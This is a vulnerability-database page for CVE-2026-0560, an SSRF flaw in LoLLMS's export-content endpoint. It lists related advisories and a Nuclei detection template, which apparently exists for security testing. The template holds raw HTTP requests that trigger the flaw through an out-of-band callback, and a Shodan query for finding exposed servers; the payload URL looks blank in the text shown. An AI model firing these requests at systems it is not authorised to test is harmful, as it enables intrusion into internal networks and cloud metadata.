| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
| Server-Side Request Forgery (SSRF) in LollMS Export Content | 29 Dec 202517:51 | – | huntr | |
| CVE-2026-0560 | 29 Mar 202617:51 | – | attackerkb | |
| The vulnerability of the _download_image_to_temp() function in the system, which is used for launching and managing large language models in LoLLMS (Lord of Large Language Multimodal Systems), allows a hacker to perform an SSRF attack. | 12 May 202600:00 | – | bdu_fstec | |
| CVE-2026-0560 | 29 Mar 202618:35 | – | circl | |
| LoLLMs 代码问题漏洞 | 29 Mar 202600:00 | – | cnnvd | |
| CVE-2026-0560 | 29 Mar 202617:51 | – | cve | |
| CVE-2026-0560 Server-Side Request Forgery (SSRF) in parisneo/lollms | 29 Mar 202617:51 | – | cvelist | |
| EUVD-2026-17037 | 29 Mar 202618:30 | – | euvd | |
| CVE-2026-0560 | 29 Mar 202618:16 | – | nvd | |
| PT-2026-1064 | 2 Jan 202600:00 | – | ptsecurity |
id: CVE-2026-0560
info:
name: LolLMS < 2.2.0 - Server-Side Request Forgery
author: ritikchaddha
severity: high
description: |
A Server-Side Request Forgery (SSRF) vulnerability exists in parisneo/lollms versions prior to 2.2.0. The /api/files/export-content endpoint processes Markdown image URLs by downloading them via _download_image_to_temp() in backend/routers/files.py without any validation, allowing an unauthenticated attacker to supply arbitrary URLs (e.g. cloud metadata endpoints or internal services) that the server will fetch, enabling internal network access, cloud metadata access, information disclosure, port scanning, and potentially remote code execution.
impact: |
Attackers can access internal network services, cloud metadata, and potentially execute remote code.
remediation: |
Update to version 2.2.0 or later.
reference:
- https://huntr.com/bounties/65e43a5e-b902-4369-b738-1825285a3ea5
- https://nvd.nist.gov/vuln/detail/CVE-2026-0560
- https://github.com/parisneo/lollms/commit/76a54f0df2df8a5b254aa627d487b5dc939a0263
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2026-0560
epss-score: 0.01765
epss-percentile: 0.75346
cwe-id: CWE-918
metadata:
verified: false
max-request: 1
vendor: parisneo
product: lollms
shodan-query: http.title:"lollms"
tags: cve,cve2026,ssrf,lollms,oast
flow: http(1) && http(2)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
part: body
words:
- "LolLMS"
internal: true
case-insensitive: false
- raw:
- |
POST /api/files/export-content HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"markdown_text":"# SSRF Test\n\n\n","output_format":"docx"}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
- type: status
status:
- 200
# digest: 4b0a00483046022100963bc292d6d8abbc6f23db01a40a05044109ce217a5ecfabaef9649dbc87a9e5022100f3a8a62ce92a09985fee67ce36e0894717cce839d54598d1b8f63ffe2c895e2b:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation